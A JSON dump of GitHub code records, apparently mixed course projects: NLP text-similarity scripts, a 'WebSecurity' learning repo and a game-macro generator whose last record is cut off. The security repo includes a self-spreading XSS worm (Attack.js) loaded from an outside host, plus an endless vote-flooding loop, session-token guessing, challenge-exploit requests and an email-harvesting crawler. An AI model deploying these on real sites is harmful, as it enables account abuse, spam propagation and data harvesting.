X_test_tfidf\n\ntrain_tfidf, test_tfidf = tfidf(train_counts, test_counts)\n\ntrain_arff = open(\"/Users/chaowang/Desktop/Descubrimiento_De_Información_En_Textos/7/BankSearch-reduced/train.arff\", \"w\")\ntest_arff = open(\"/Users/chaowang/Desktop/Descubrimiento_De_Información_En_Textos/7/BankSearch-reduced/test.arff\", \"w\") # Open it by writing\n\ntrain_arff.write(\"@RELATION train\\n\\n\")\ntest_arff.write(\"@RELATION train\\n\\n\")\n\ntrain_arff.write(\"@ATTRIBUTE Label {A,B,C,D,E,F,G,H,I,J}\\n\")\ntest_arff.write(\"@ATTRIBUTE Label {A,B,C,D,E,F,G,H,I,J}\\n\")\n\nfor i in range(train_tfidf.shape[1]):\n\ttrain_arff.write(\"@ATTRIBUTE {} numeric\\n\".format(vocabulary[i]))\n\ttest_arff.write(\"@ATTRIBUTE {} numeric\\n\".format(vocabulary[i]))\n\ntrain_arff.write(\"\\n@DATA\\n\")\ntest_arff.write(\"\\n@DATA\\n\")\n\nfor i in range(700):\n\ttrain_arff.write(\"{},{}\\n\".format(train_data[1][i], ','.join(str(v) for v in train_tfidf.toarray()[i])))\nfor i in range(300):\n\ttest_arff.write(\"{},{}\\n\".format(test_data[1][i], ','.join(str(v) for v in test_tfidf.toarray()[i])))\n\n\n\t\n\n\n"
},
{
"alpha_fraction": 0.6702473163604736,
"alphanum_fraction": 0.6934798955917358,
"avg_line_length": 23.85714340209961,
"blob_id": "2b06d5bae8f6e91fe3846b63e5456457977298b7",
"content_id": "34a7a4609492293d05fab375719f6539ed718a40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4047,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 161,
"path": "/nlp_task_similarity.py",
"repo_name": "chao665190/Some_Course_Projects",
"src_encoding": "UTF-8",
"text": "from gensim.models import KeyedVectors\nimport nltk\nfrom nltk import word_tokenize\nfrom nltk.corpus import genesis\nfrom nltk.corpus import wordnet as wn\nfrom nltk.corpus import wordnet_ic\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy.stats import pearsonr\n\nbrown_ic = wordnet_ic.ic('ic-brown.dat')\ngenesis_ic = wn.ic(genesis, False, 0.0)\nsemcor_ic = wordnet_ic.ic('ic-semcor.dat')\nic = semcor_ic\n\ncache_map = {}\nmodel = None\n\n\ndef EliminateToken(tokens):\n\ttuples = nltk.pos_tag(tokens)\n\ttokens = []\n\tfor token, pos in tuples:\n\t\tif pos != \"CC\" and pos != \"TO\" and pos != \"DT\":\n\t\t\ttokens.append(token)\n\treturn tokens\n\ndef Stemmer(tokens):\n\tnew_tokens = []\n\tporter = nltk.PorterStemmer()\n\tfor t in tokens:\n\t\tt = porter.stem(t)\n\t\tif len(t) != 1 or t.isalnum():\n\t\t\tnew_tokens.append(t)\n\treturn new_tokens\n\n\ndef FindMaxSimForPos(w, wi, pos):\n\tw_synsets = wn.synsets(w, pos)\n\twi_synsets = wn.synsets(wi, pos)\n\tmax_sim = 0\n\tfor w_synset in w_synsets:\n\t\tfor wi_synset in wi_synsets:\n\t\t\t#if w_synset.pos() not in ic or wi_synset.pos() not in ic:\n\t\t\t\t#continue\n\t\t\tsim = wn.path_similarity(w_synset, wi_synset)\n\t\t\tif sim == 1:\n\t\t\t\treturn 1\n\t\t\tif sim != None:\n\t\t\t\tmax_sim = max(max_sim, sim)\n\treturn max_sim\t\t\t\n\ndef FindMaxSim(w, wi):\n\tif wi == w:\n\t\treturn 1\n\tif (w, wi) in cache_map:#共8000多个句子,之前找过的单词对存入cache,节省计算量\n\t\treturn cache_map[(w, wi)]\n\tmax_sim = 0\n\tmax_sim = max(max_sim, FindMaxSimForPos(w, wi, wn.NOUN))\n\tif max_sim == 1:\n\t\tcache_map[(w, wi)] = 1\n\t\treturn 1\n\tmax_sim = max(max_sim, FindMaxSimForPos(w, wi, wn.ADJ))\n\tif max_sim == 1:\n\t\tcache_map[(w, wi)] = 1\n\t\treturn 1\n\tmax_sim = max(max_sim, FindMaxSimForPos(w, wi, wn.ADV))\n\tif max_sim == 1:\n\t\tcache_map[(w, wi)] = 1\n\t\treturn 1\n\tmax_sim = max(max_sim, FindMaxSimForPos(w, wi, wn.VERB))\n\tcache_map[(w, wi)] = max_sim\n\treturn max_sim\n\n\ndef FindMaxSimInSentence(w, t):\n\tmax_sim = 0\n\tfor wi in t:\n\t\tmax_sim = max(max_sim, FindMaxSim(w, wi))\n\t\tif max_sim == 1:\n\t\t\tbreak\n\t\n\treturn max_sim\n\ndef BuildWordNetBasedVectors(s1, s2):\n\tt1 = set(s1)\n\tt2 = set(s2)\n\n\tt = sorted(t1.union(t2))\n\n\tv1 = []\n\tv2 = []\n\tfor w in t:\n\t\tv1.append(FindMaxSimInSentence(w, t1))\n\t\tv2.append(FindMaxSimInSentence(w, t2))\t\n\treturn np.array(v1), np.array(v2)\n\n\ndef BuildWord2VecBasedVectors(s1, s2):\n\tv1 = np.zeros(model.vector_size)\n\tv2 = np.zeros(model.vector_size)\n\tfor word in s1:\n\t\tif word in model.vocab:\n\t\t\tv1 += model.word_vec(word)\n\n\tfor word in s2:\n\t\tif word in model.vocab:\n\t\t\tv2 += model.word_vec(word)\n\treturn v1, v2\n\n\nf = open('/Users/chaowang/Desktop/nlp/final_task/stsbenchmark/sts-train.csv')\n\nscorelist = []\nsentencetokens = []\n\npattern = r'''(?x) # set flag to allow verbose regexps\n\t\t\\w+ # words with optional internal hyphens\n\t '''\n\nwnl = nltk.WordNetLemmatizer()\n\nuse_word2vec = False\neliminate_token = True\nlower_case = True\nlemmatize_token = True\n\nif use_word2vec:\n\tmodel = KeyedVectors.load_word2vec_format('/Users/chaowang/Desktop/nlp/final_task/GoogleNews-vectors-negative300.bin',binary=True)\n\nfor line in f:\n\tline = line.strip()\n\telements = line.split(\"\\t\")\n\t\n\tscorelist.append(float(elements[4]))\n\n\tsentence1token = nltk.regexp_tokenize(elements[5], pattern)\n\tsentence2token = nltk.regexp_tokenize(elements[6], pattern)\n\tif eliminate_token:\n\t\tsentence1token = EliminateToken(sentence1token)\n\t\tsentence2token = EliminateToken(sentence2token)\n\tif lower_case:\n\t\tsentence1token = [letters.lower() for letters in sentence1token]\n\t\tsentence2token = [letters.lower() for letters in sentence2token]\n\tif lemmatize_token:\n\t\tsentence1token = [wnl.lemmatize(t) for t in sentence1token]\n\t\tsentence2token = [wnl.lemmatize(t) for t in sentence2token]\n\n\tsentencetokens.append([sentence1token, sentence2token])\n\nsimlist = []\nfor elem in sentencetokens:\n\tif use_word2vec:\n\t\tv1, v2 = BuildWord2VecBasedVectors(elem[0], elem[1])\n\telse:\n\t\tv1, v2 = BuildWordNetBasedVectors(elem[0], elem[1])\n\t\n\tcos_sim = cosine_similarity(v1.reshape(1,-1), v2.reshape(1,-1))[0][0]\n\tsimlist.append(cos_sim)\n\nprint(pearsonr(simlist, scorelist))\n\n"
}
] | 2 |
JonLMyers/WebSecurity
|
https://github.com/JonLMyers/WebSecurity
|
e075bf12914bfde167daef515518b84a187a5ce0
|
5a840bc316c32b9046035706373700831e6336b0
|
3f59ea2dcc21319d1af488558c8cd0b2dd117b09
|
refs/heads/master
| 2021-01-17T12:44:58.071326 | 2016-11-29T23:58:41 | 2016-11-29T23:58:41 | 68,342,121 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.782608687877655,
"alphanum_fraction": 0.782608687877655,
"avg_line_length": 44.5,
"blob_id": "ca0647f706bda63cdfcae375430a2d626b986350",
"content_id": "66053161254db99613669f7681acb49afb2b2305",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 92,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 2,
"path": "/README.md",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "# WebSecurity\nA series of tools, exploits, and POC's for learning web application secuity. \n"
},
{
"alpha_fraction": 0.5625841021537781,
"alphanum_fraction": 0.6096904277801514,
"avg_line_length": 27.538461685180664,
"blob_id": "99b5af590af083d13e5f623c28d67266add3c745",
"content_id": "c75707cc781b0647b4bdf32f3d9e2b6f4fb28ee1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 743,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 26,
"path": "/intBreak.py",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport socket\nimport urllib\n\ndef Connect(host, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n return s\n\ndef SendDataA1(s):\n con = \"GET /posts/1/vote/like HTTP/1.1\\n\"\n host = \"Host: localhost\\n\"\n leng = \"Content-Length: 2\\n\\n\"\n breaker = \"Connection: close\\n\"\n ua = \"User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0\\n\"\n b = \"Accept: */*\\n\"\n a = \"Accept-Language: en-US,en;q=0.5\\n\"\n c = \"Accept-Encoding: gzip, deflate, br\\n\"\n n = \"X-Requested-With: XMLHttpRequest\\n\"\n\n s.send(con + host + ua + b + a + c + n + breaker + leng)\n\nwhile(1):\n s = Connect(\"localhost\", 3000)\n SendDataA1(s) \n s.close()\n\n"
},
{
"alpha_fraction": 0.5200182795524597,
"alphanum_fraction": 0.5411804914474487,
"avg_line_length": 29.144826889038086,
"blob_id": "02206066d2f498a3a0b22add95c43dff6656b8a0",
"content_id": "7a9d026d8c8d2481fa5275877245b53a6599f566",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8742,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 290,
"path": "/WebCrawler/Crawler.py",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport urllib2\nimport urllib\nimport socket\nimport re\nimport time\nimport os\nimport threading\nimport sys\nimport argparse\nimport mechanize\nimport urlparse\nimport urllib\nimport ssl\nimport errno\nimport json\nimport csv\nimport pandas\nfrom urlparse import urlsplit\nfrom lxml.html import parse\nfrom socket import error as SocketError\nfrom BeautifulSoup import BeautifulSoup, SoupStrainer\nmaxConnections = 5\npool = threading.BoundedSemaphore(value=maxConnections)\n\n\ndef Connect(url, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(10)\n if port == 443:\n sock = ssl.wrap_socket(s)\n print \"Connecting to: {}:{}\".format(url, port)\n try:\n sock.connect((url, port))\n except SocketError as e:\n print e\n sock.settimeout(None)\n #sock.setblocking(0)\n return sock\n else:\n s.connect((url, port))\n s.settimeout(None)\n #s.setblocking(0)\n return s\n\ndef ScrapeCsecWeb(s):\n request = \"GET /programs/computing-security-bs HTTP/1.1\\n\"\n requestHost = \"Host: www.rit.edu\\n\\n\"\n fullResponse = ''\n i = 0;\n s.send(request + requestHost)\n\n while True:\n response = s.recv(2048)\n fullResponse = fullResponse + response\n if response == '':\n break\n\n s.close()\n\n soup = BeautifulSoup(fullResponse)\n courses = soup.findAll('table')[0].tbody.findAll('tr')\n for course in courses:\n if i > 1 and len(course.findAll('td')) > 2:\n number = course.findAll('td')[0].contents\n name = course.findAll('td')[1].contents\n number = ''.join(number)\n name = ''.join(name)\n number = number.replace(u'\\xa0', \"1\")\n if number != \"1\":\n number = number.replace(\"1 1\", \"\")\n print number + name\n i = i + 1\n\ndef DownloadImage(img2, i):\n image = ''\n img2 = img2.replace(\" \", \"%20\")\n if len(img2) < 350:\n s = Connect('www.rit.edu', 80)\n request = \"GET \" + img2 + \" HTTP/1.1\\n\"\n print request\n agent = \"User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0\\n\"\n lang = \"Accept-Language: en-US,en;q=0.5\\n\"\n con = \"Upgrade-Insecure-Requests: 1\\n\"\n encoding = \"Accept-Encoding: gzip, deflate\\n\"\n noCache = \"Cache-Control: no-store, no-cache, must-revalidate, max-age=0\\n\"\n prag = \"Pragma: no-cache\\n\"\n connection = \"Connection: keep-alive\\n\"\n requestHost = \"Host: www.rit.edu\\r\\n\\r\\n\"\n pool.acquire() \n s.send(request + encoding + connection + prag + noCache + agent + lang + con + requestHost)\n while True:\n response = s.recv(2048)\n if len(response) < 1: break\n image = image + response\n \n s.close()\n pool.release()\n \n pos = image.find(\"\\r\\n\\r\\n\")\n image = image[pos + 4:]\n imgFile = \"/home/soren/Github/WebSecurity/pictures/image\" + str(i) + \".jpg\"\n fhand = open(imgFile, 'w+')\n fhand.write(image)\n fhand.close()\n\ndef ScrapeCsecImages(s):\n request = \"GET /gccis/computingsecurity/people HTTP/1.1\\n\"\n requestHost = \"Host: www.rit.edu\\r\\n\\r\\n\"\n noCache = \"Cache-Control: no-cache, no-store, must-revalidate\\n\"\n imgList = []\n threads = []\n\n fullResponse = ''\n i = 1\n s.send(request + noCache + requestHost)\n\n while True:\n response = s.recv(2048)\n if response == '':\n break \n fullResponse = fullResponse + response\n s.close()\n\n soup = BeautifulSoup(fullResponse)\n imgs = soup.findAll(\"div\", {\"class\":\"staff-picture\"})\n for img in imgs:\n imgList.append(str(img.findAll('img')[0].get('src')))\n \n for img2 in imgList:\n \n t = threading.Thread(target=DownloadImage, args=(img2, i))\n threads.append(t)\n t.start()\n DownloadImage(img2, i)\n i += 1\n\ndef MakeRequest(s, url, host):\n request = \"GET \" + url + \" HTTP/1.1\\n\"\n keep = \"Connection: Close\\n\"\n userAgent = \"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\\n\"\n requestHost = \"Host: \" + host + \"\\r\\n\\r\\n\" \n fullResponse = ''\n s.send(request + keep + userAgent + requestHost)\n\n while True:\n response = s.recv(2048)\n if response == '':\n break \n fullResponse = fullResponse + response\n \n return fullResponse\n\ndef MakeRequestSSL(s, url, host):\n request = \"GET \" + url + \" HTTP/1.1\\n\"\n requestHost = \"Host: \" + host + \"\\r\\n\\r\\n\" \n userAgent = \"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\\n\"\n fullResponse = ''\n keep = 'Connection: close\\n'\n print \"########\"\n print request + keep + userAgent + requestHost\n print \"########\"\n s.send(request + keep + userAgent + requestHost)\n while True:\n response = s.recv(2048)\n if response == '':\n break \n fullResponse = fullResponse + response\n s.close()\n return fullResponse\n\ndef HandleRequest(url, host):\n link = ''\n #print host\n #print url\n if url.find(\"https://\") is not -1:\n try:\n s = Connect(host, 443)\n page = MakeRequestSSL(s, url, host)\n s.close()\n return page\n except ValueError:\n return ValueError\n else:\n s = Connect(host, 80)\n page = MakeRequest(s, url, host)\n #print len(page)\n \n #print \"---------------------------------------------------------------\"\n if len(page) < 700:\n headers, body = page.split(\"\\r\\n\\r\\n\")\n #print headers\n match = re.findall(r'HTTP/1\\.(?:0|1) 301[^\\r\\n]+', headers)\n if len(match) > 0:\n locationMatch = re.findall(r\"Location: ([^\\r\\n]+)\", headers)\n if len(locationMatch) > 0:\n link = locationMatch[0]\n host = link.replace(\"http://\", \"\").replace(\"https://\", \"\").split(\"/\", 1)[0]\n print host\n print link\n page = HandleRequest(link, host)\n else:\n raise ValueError(\"error finding location header\")\n\n s.close()\n return page\n\ndef FullWebCrawl(booler, csv):\n maxPages = 4\n findEmails = 1\n emails = set()\n urlQueue = []\n crawledUrls = []\n \n if booler:\n print 'Enter depth: '\n maxPages = int(input(\"$> \"))\n print 'Enter host. Example: \"www.rit.edu\"'\n host = str(input(\"$> \"))\n print 'Enter Url to crawl with trailing \"/\". Example: \"http://www.rit.edu/\"'\n url = str(input(\"$> \"))\n else:\n url = '/'\n host = csv\n\n urlQueue.append(url)\n while len(urlQueue) > 0 and maxPages > 0:\n url = urlQueue[0]\n page = HandleRequest(url, host)\n newEmails = set(re.findall(r\"[a-z0-9\\.\\-+_]+@[a-z0-9\\.\\-+_]+\\.[a-z]+\", page, re.I))\n print newEmails\n emails.update(newEmails)\n \n surl = urlQueue[0]\n crawledUrls.append(surl)\n urlQueue.pop(0)\n\n #print \"Now in: \" + surl\n #print \"-------------------------------------------------------------\"\n soup = BeautifulSoup(page)\n links = soup.findAll('a')\n\n for tag in links:\n link = tag.get('href', None)\n if link is not None and link not in crawledUrls and url in link:\n #print link\n urlQueue.append(link.encode('utf-8'))\n crawledUrls.append(link.encode('utf-8'))\n \n maxPages = maxPages - 1\n\n print emails\n return crawledUrls \n\ndef DirBuster(dirFile):\n host = \"52.23.205.104\"\n addPage = dirFile.split()\n print addPage\n\ndef main():\n directories = []\n #s = Connect('www.rit.edu', 80)\n s2 = Connect('www.rit.edu', 80)\n #ScrapeCsecWeb(s)\n ScrapeCsecImages(s2)\n #FullWebCrawl(True, None)\n\n '''df = pandas.read_csv('companies.csv', names=['name', 'url'])\n urls = df.url.tolist()\n for url in urls:\n try:\n url = url.replace(\"http://\", \"\")\n url = url.replace(\"https://\", \"\")\n url = url.replace(\"/market/pages/index.aspx\", \"\")\n url = url.replace(\"/pages/home.aspx\", \"\")\n url = url.replace(\"/\", \"\")\n directories.extend(FullWebCrawl(False, url))\n except socket.error as e:\n print e\n\n os.remove(\"directories.txt\")\n dirFile = open(\"directories.txt\", 'w')\n for item in directories:\n print>>dirFile, item'''\n #dirFile.close()\n #dirFile = open(\"directories.txt\", 'r')\n #DirBuster(dirFile)\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.48407644033432007,
"alphanum_fraction": 0.5668789744377136,
"avg_line_length": 19.933332443237305,
"blob_id": "5105cdd105936567e4f626869fedd2444c501a1f",
"content_id": "2200d073a4f6d2b904665b6f824e19bb088e1bcf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 314,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 15,
"path": "/WebCrawler/PHP/token.php",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "<?php\n$base_url = \"http://52.90.2.57/armbook/?ARM_SESSION=\";\n$test_url = \"http://52.90.2.57/armbook/home.php\";\n$urls = array();\n$i = 0;\nwhile($i < 50){\n $new_session = substr(md5(time()), 0, 22);\n $value = $base_url.$new_session;\n $response = $value;\n echo \"\\n\";\n echo $response;\n sleep(1);\n $i++;\n}\n?>\n"
},
{
"alpha_fraction": 0.5740597248077393,
"alphanum_fraction": 0.6079553961753845,
"avg_line_length": 28.76036834716797,
"blob_id": "7a8ba9f7d4db87dbcfb71b9ae966ab8e984de88b",
"content_id": "47a8734d29f2a23bfb25490be61a5e9b3cf1e67b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6461,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 217,
"path": "/BasicHTTP/HttpConnect.py",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport socket\nimport urllib\n\ndef Connect(host, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n return s\n\ndef SendDataA1(s, request, requestHost):\n con = \"Connection: keep-alive\\n\\n\"\n s.send(request + requestHost + con)\n\ndef SendDataA2(s, request, requestHost, token):\n tokenParam = \"token=\" + token + \"\\n\\n\" \n contentType = \"Content-Type: application/x-www-form-urlencoded\\n\"\n contentLen = \"Content-Length: {}\\n\\n\".format(len(tokenParam)-2)\n s.send(request + requestHost + contentType + contentLen + tokenParam)\n return s\n\ndef SendDataA3(s, token, solution):\n tokenParam = \"&token=\" + token + \"\\n\\n\"\n captchaParam = \"solution=\" + str(solution)\n content = captchaParam + tokenParam\n\n #connection = \"Connection: keep-alive\\n\"\n contentType = \"Content-Type: application/x-www-form-urlencoded\\n\"\n contentLen =\"Content-Length: {}\\n\\n\".format(len(content)-2)\n request = \"POST /getFlag3Challenge HTTP/1.1\\n\"\n requestHost = \"Host: 54.209.150.110\\n\"\n\n s.send(request + requestHost + contentType + contentLen + content) \n\n#16^56 < 256^16 < 256^32 = total char combinations somewhere between AES128 and AES256\ndef RecieveAndPrintA1(s):\n full = \"\"\n token = \"\"\n\n while True:\n response = s.recv(1024)\n print response\n if response == '':\n break\n else:\n full = response\n \n full = full.split()\n token = full[len(full)-1]\n token = token[:-1]\n return token\n\ndef RecieveAndPrintA2(s2, token):\n full = \"\"\n full2 = \"\"\n toke = \"\"\n\n while True:\n response = s2.recv(1024)\n print response\n if response == '':\n break\n else:\n full = response\n \n full = full.split()\n captcha = full[len(full)-1]\n solution = PerformOperation(captcha)\n print solution\n\n s2.close()\n s = Connect('54.209.150.110', 80)\n SendDataA3(s, token, solution) \n while True:\n response2 = s.recv(1024)\n print response2\n if response2 == '':\n break\n else:\n full2 = response2\n full2 = full2.split()\n toke = full2[len(full2)-1]\n toke = toke[:-1]\n return toke \n\ndef CreateAccount(s, token, request, requestHost):\n tokenParam = \"token=\" + token + \"\\n\\n\"\n content = \"username=hostmaster&\" + tokenParam\n contentLen =\"Content-Length: {}\\n\\n\".format(len(content)-2)\n contentType = \"Content-Type: application/x-www-form-urlencoded\\n\"\n userAgent = \"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\\n\"\n accept = \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\n\"\n acceptLan = \"Accept-Language: en-US,en;q=0.5\\n\"\n acceptEnc = \"Accept-Encoding: gzip, deflate\\n\"\n print request + userAgent + requestHost + contentType + contentLen + content\n s.send(request + userAgent + requestHost + accept + acceptLan + acceptEnc + contentType + contentLen + content)\n\ndef TestLogin(s, token, request, requestHost, password):\n content = \"token=\" + token + \"&username=hostmaster\" + \"&password=\" + urllib.quote_plus(password) + \"\\n\\n\"\n contentLen =\"Content-Length: {}\\n\\n\".format(len(content)-2)\n contentType = \"Content-Type: application/x-www-form-urlencoded\\n\"\n userAgent = \"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\\n\"\n accept = \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\n\"\n acceptLan = \"Accept-Language: en-US,en;q=0.5\\n\"\n acceptEnc = \"Accept-Encoding: gzip, deflate\\n\"\n\n\n print request + userAgent + requestHost + accept + acceptLan + acceptEnc + contentType + contentLen + content\n s.send(request + userAgent + requestHost + accept + acceptLan + acceptEnc + contentType + contentLen + content)\n\ndef PerformOperation(captcha):\n operator = ''\n operend1 = ''\n operend2 = ''\n captcha = list(captcha)\n\n for char in captcha:\n if char == '+':\n operator = '+'\n elif char == '-':\n operator = '-'\n elif char == '*':\n operator = '*'\n elif char == '/':\n operator = '/'\n elif char == '\"':\n print ''\n elif operator == '':\n operend1 = operend1 + char\n elif operator != '':\n operend2 = operend2 + char\n else:\n print \"You broke something. Fix it.\"\n\n if operator == '+':\n captcha = int(operend1) + int(operend2)\n elif operator == '-':\n captcha = int(operend1) - int(operend2)\n elif operator == '*':\n captcha = int(operend1) * int(operend2)\n elif operator == '/':\n captcha = int(operend1) / int(operend2)\n else:\n print \"You broke something. Fix it.\"\n \n return captcha\n\ndef BasicConnect():\n host = '54.209.150.110'\n port = 80\n request = \"POST / HTTP/1.1\\n\"\n requestHost = \"Host: 54.209.150.110\\n\\n\"\n\n s = Connect(host, port)\n s.send(request + requestHost)\n flag0 = RecieveAndPrintA1(s)\n print flag0\n s.close()\n\ndef RecieveAndPrintPass(s):\n full = \"\"\n token = \"\"\n\n while True:\n response = s.recv(1024)\n print response\n if response == '':\n break\n else:\n full = response\n \n full = full.split()\n token = full[len(full)-1]\n token = token[:]\n return token\n\n#------------------------------------------------------------------------------#\nhost = '54.209.150.110'\nport = 80\nrequest = \"POST /getSecure HTTP/1.1\\n\"\nrequestHost = \"Host: 54.209.150.110\\n\"\n\nBasicConnect()\nprint \"$----------> Start token and flag collection.\"\n\ns = Connect(host, port)\nSendDataA1(s, request, requestHost)\ntoken = RecieveAndPrintA1(s)\nprint token\ns.close()\n\nrequest = \"POST /getFlag2 HTTP/1.1\\n\"\ns = Connect(host, port)\nSendDataA2(s, request, requestHost, token)\nflag1 = RecieveAndPrintA1(s)\nprint flag1\ns.close()\n\nrequest = \"POST /getFlag3Challenge HTTP/1.1\\n\"\ns = Connect(host, port)\ns2 = SendDataA2(s, request, requestHost, token)\nflag2 = RecieveAndPrintA2(s2, token)\nprint flag2\ns2.close()\n\nrequest = \"POST /createAccount HTTP/1.1\\n\"\ns = Connect(host, port)\nCreateAccount(s, token, request, requestHost)\npassword = RecieveAndPrintPass(s)\ns.close()\nprint password\n\nrequest = \"POST /login HTTP/1.1\\n\"\ns = Connect(host, port)\nTestLogin(s, token, request, requestHost, password)\nsuccess = RecieveAndPrintA1(s)\ns.close()\nprint success\n\n\n\n"
},
{
"alpha_fraction": 0.6122807264328003,
"alphanum_fraction": 0.6350877285003662,
"avg_line_length": 39.71428680419922,
"blob_id": "11eb848fe1be6ea038ad2fa4a89bf496c47cf4c5",
"content_id": "392ee9578125d7d3c8e9c738f27cd7f74f4e3126",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 570,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 14,
"path": "/Attack.js",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "$( document ).ready(function(){\n\n $.get(\"add_friend.php?id=114\");\n $.ajax({url:\"add_comment.php?id=114&comment=\"+ new Date()});\n $.get(\"home.php\", function(data, status){\n var ln = data.search(\"id=\");\n var ids = data.substr(ln, 6);\n var id = ids.match(/\\d+/)[0];\n\t\t\t$.ajax({url:\"add_comment.php?id=\"+id+\"&comment=\"+encodeURI(document.getElementById(\"m\").outerHTML)});\n\t});\n});\n\n//<script type=\"text/javascript\" src=\"https://rawgit.com/JonLMyers/WebSecurity/master/Attack.js\"></script>\n//https://drive.google.com/host/0B_BwSrIRFmFza01yWEV3aWQ2eHM\n"
}
] | 6 |
tobyatgithub/GxB_BlueStack_automation
|
https://github.com/tobyatgithub/GxB_BlueStack_automation
|
4d8338e0ac87b40be8abeed050535151e7142265
|
64ecb8f2bcf8a284fe2d5904fd8122fa8bf05d26
|
746f93504c48d8930a2bd1ddcb0fb80ef0336dbc
|
refs/heads/main
| 2023-07-15T09:11:23.568816 | 2021-08-24T07:55:24 | 2021-08-24T07:55:24 | 398,653,989 | 0 | 0 |
MIT
| 2021-08-21T20:52:01 | 2021-08-21T21:10:37 | 2021-08-24T07:55:24 |
Python
|
[
{
"alpha_fraction": 0.7531017661094666,
"alphanum_fraction": 0.7636476159095764,
"avg_line_length": 31.239999771118164,
"blob_id": "503bb2122b1b8877e1911e8171f5cbd04f4d88b1",
"content_id": "ef5048cf54cc5e94c1c0162068db92afd537e0d8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1612,
"license_type": "permissive",
"max_line_length": 162,
"num_lines": 50,
"path": "/README.md",
"repo_name": "tobyatgithub/GxB_BlueStack_automation",
"src_encoding": "UTF-8",
"text": "# GxB_BlueStack_automation\n\nUsing python to generate json marco script for Blue Stack to execute for game GxB2\n\n## Goal\n\nCreate a stable method to create and maintain auto marco of BlueStack5 for GxB game. (This method can be shared by any other apps running on BlueStack simulator.)\n\n## Update Logs\n\n-v1.0 can performing basic functions as campaign collect, excursion collect, dorm collect, etc.\n-v1.1 taking refactor suggestion from kekw#0204\n\n## Challenges\n\n- (maintainance need) The game UI gets updated frequently\n- (easy-to-regenerate) Mannual record has to be perfect in one run, you also need to make sure it covers different situations and responses\n- (scale-up need) New functionalities frequently added\n\n## Install\n\nNo specific package install required. All library used in this code is python standard.\n\n## Usage\n\nYou can use the `DailyTask_v3.json` directly (by importing it into your marco manager.)\n\nOR:\n\n1. Clone this repo (make sure you have `git` in your terminal)\n\n```bash\ngit clone https://github.com/tobyatgithub/GxB_BlueStack_automation.git\ncd GxB_BlueStack_automation\n```\n\n2. Generate the json marco script\n\n```bash\npython jsonGenerator.py\n```\n\n3. The default result will be called `data.json` in the same folder. You can import this script directly as a marco in BlueStacks:\n -> open marco manager -> import -> select this json file\n\n## Parameters\n\nRight now the script is set to run every 4 hours (the whole script shall take about 4-5 mins). \nEach time, it will open the game, do all the collects, and close the game. \nTODO: more about the detailed parameters and how to change it.\n"
},
{
"alpha_fraction": 0.5725909471511841,
"alphanum_fraction": 0.6069464087486267,
"avg_line_length": 32.09975051879883,
"blob_id": "5274cff1a48467503a9e277dcd3e0a7e085e7bc9",
"content_id": "967a04a4c05b3a23c7d32ca2bab50b91d39cdc65",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13273,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 401,
"path": "/jsonGenerator.py",
"repo_name": "tobyatgithub/GxB_BlueStack_automation",
"src_encoding": "UTF-8",
